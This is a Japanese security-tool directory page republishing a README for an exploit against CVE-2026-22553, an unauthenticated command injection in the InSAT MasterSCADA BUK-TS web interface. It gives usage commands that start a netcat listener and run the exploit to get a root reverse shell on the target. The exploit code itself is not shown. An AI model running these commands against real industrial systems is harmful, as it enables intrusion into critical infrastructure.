Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ — 認証不要のOSコマンドインジェクションエクスプロイト for InSAT MasterSCADA BUK-TS MMadmServ Webインターフェース。HTTP POSTリクエストを介してルート権限でリバースシェルを送信します。CVSS 9.8 クリティカル。 | Kitploit
ツール/GitHubGitHub/mbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv
ペイロード生成エクスプロイトSCADA/ICSセキュリティウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubmbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv

CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ

認証不要のOSコマンドインジェクションエクスプロイト for InSAT MasterSCADA BUK-TS MMadmServ Webインターフェース。HTTP POSTリクエストを介してルート権限でリバースシェルを送信します。CVSS 9.8 クリティカル。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
3ヶ月前未レビュー

CVE-2026-22553 Python License Author

InSAT MasterSCADA BUK-TS - 認証不要のRCE

CVE-2026-22553 | CVSS 9.8 重大| エクスプロイト作成者 Mohammed Idrees Banyamer


📝 説明

InSAT MasterSCADA BUK-TS にはMMadmServ Webインターフェースに認証不要のOSコマンドインジェクションの脆弱性があります。この欠陥により、リモート攻撃者は認証なしで完全なリモートコード実行(RCE)を達成できます。

  • 影響を受ける製品: InSAT MasterSCADA BUK-TS (全バージョン)
  • 脆弱性タイプ: OSコマンドインジェクション (CWE-78)
  • 深刻度: 重大 (CVSS v3.1 スコア: 9.8)
  • エクスプロイト作成者: Mohammed Idrees Banyamer
  • 国: ヨルダン 🇯🇴

🛠️ 攻撃手法ダイアグラム

root@kitploit:~
flowchart TD
    A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
    B -->|Unauthenticated| C[Vulnerable Parameter]
    C -->|OS Command Injection| D[Command Execution on Target Server]
    D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
    
    style A fill:#ff4d4d,stroke:#fff
    style E fill:#4dff88,stroke:#fff

🚀 使用方法

root@kitploit:~
python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>

例

root@kitploit:~
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444

オプション

オプション説明
targetターゲットURL (例: http://ip:port)
--lhostあなたのIPアドレス (リバースシェル)
--lportあなたのリスニングポート

📌 使い方

  1. 自分のマシンでリスナーを起動します:

    root@kitploit:~
    nc -lvnp 4444
    
  2. エクスプロイトを実行します:

    root@kitploit:~
    python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
    
  3. root/system権限でリバースシェルを取得します。


⚠️ 免責事項

このエクスプロイトは教育目的および許可されたペネトレーションテストのためにのみ提供されます。
自分が所有していないシステムに対する不正使用は違法であり、国際法に違反する可能性があります。
作成者は誤使用に対する一切の責任を負いません。


📬 作成者

Mohammed Idrees Banyamer

  • Instagram: @banyamer_security
  • GitHub: mbanyamer
  • 国: ヨルダン 🇯🇴

このリポジトリが役に立ったら⭐を付けてください!

ツールをダウンロード